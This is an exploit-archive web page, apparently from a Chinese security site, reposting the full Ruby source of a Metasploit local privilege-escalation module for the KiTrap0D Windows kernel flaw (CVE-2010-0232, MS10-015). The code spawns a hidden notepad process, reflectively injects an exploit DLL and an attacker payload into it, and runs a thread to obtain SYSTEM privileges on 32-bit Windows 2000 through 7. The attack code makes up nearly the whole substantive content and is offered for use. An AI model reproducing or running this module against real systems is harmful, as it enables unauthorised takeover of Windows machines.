首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows SYSTEM Escalation Via KiTrap0D
来源:metasploit.com 作者:Pusscat 发布时间:2013-11-15  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/exe'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = GreatRanking

  include Post::File
  include Post::Windows::Priv

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows SYSTEM escalation via KiTrap0D',
      'Description'   => %q{
        This module will create a new session with SYSTEM privileges via the
        KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already
        elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,
        and is not supported on x64 editions of Windows.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
          'Tavis Ormandy', # Original resesarcher and exploit creator
          'HD Moore',      # Port of Tavis' code to meterpreter module
          'Pusscat',       # Port of Tavis' code to meterpreter module
          'OJ Reeves'      # Port of meterpreter code to a windows local exploit
        ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       => [
        [ 'Windows 2K SP4 - Windows 7 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ]
      ],
      'DefaultTarget' => 0,
      'References'    => [
        [ 'CVE', '2010-0232' ],
        [ 'OSVDB', '61854' ],
        [ 'MSB', 'MS10-015' ],
        [ 'EDB', '11199' ],
        [ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ]
      ],
      'DisclosureDate'=> "Jan 19 2010"
    ))

  end

  def check
    # Validate platform architecture
    if sysinfo["Architecture"] =~ /x64|WOW64/i
      return Exploit::CheckCode::Safe
    end

    # Validate OS version
    winver = sysinfo["OS"]
    unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    if check == Exploit::CheckCode::Safe
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
    end

    dll = ''
    offset = nil

    print_status("Launching notepad to host the exploit...")
    cmd = "notepad.exe"
    opts = {'Hidden' => true}
    process = client.sys.process.execute(cmd, nil, opts)
    pid = process.pid
    host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
    print_good("Process #{pid} launched.")

    print_status("Reflectively injecting the exploit DLL into #{pid}...")
    library_path = ::File.join(Msf::Config.data_directory, "exploits",
                               "CVE-2010-0232", "kitrap0d.x86.dll")
    library_path = ::File.expand_path(library_path)
    ::File.open(library_path, 'rb') { |f| dll = f.read }
    pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
    pe.exports.entries.each do |e|
      if e.name =~ /^\S*ReflectiveLoader\S*/
        offset = pe.rva_to_file_offset(e.rva)
        break
      end
    end
    # Inject the exloit, but don't run it yet.
    exploit_mem = inject_into_pid(dll, host_process)

    print_status("Exploit injected. Injecting payload into #{pid}...")
    # Inject the payload into the process so that it's runnable by the exploit.
    payload_mem = inject_into_pid(payload.encoded, host_process)

    print_status("Payload injected. Executing exploit...")
    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    host_process.thread.create(exploit_mem + offset, payload_mem)

    print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
  end

protected

  def inject_into_pid(payload, process)
    payload_size = payload.length
    payload_size += 1024 - (payload.length % 1024) unless payload.length % 1024 == 0
    payload_mem = process.memory.allocate(payload_size)
    process.memory.protect(payload_mem)
    process.memory.write(payload_mem, payload)
    return payload_mem
  end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Dahua DVR Authentication Bypas
·Supermicro Onboard IPMI close_
·Watermark Master v2.2.23 .wsty
·FreeBSD 10 qlxge/qlxgbe Driver
·Plogue Sforzando 1.665 Buffer
·FreeBSD 10 nand Driver IOCTL K
·ALLPlayer 5.6.2 (.m3u) - Local
·Avira Secure Backup 1.0.0.1 Bu
·VideoSpirit Lite 1.77 - (SEH)
·Linux Kernel bt8xx Video Drive
·VideoSpirit Pro 1.90 - (SEH) B
·DeepOfix 3.3 SMTP Authenticati
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved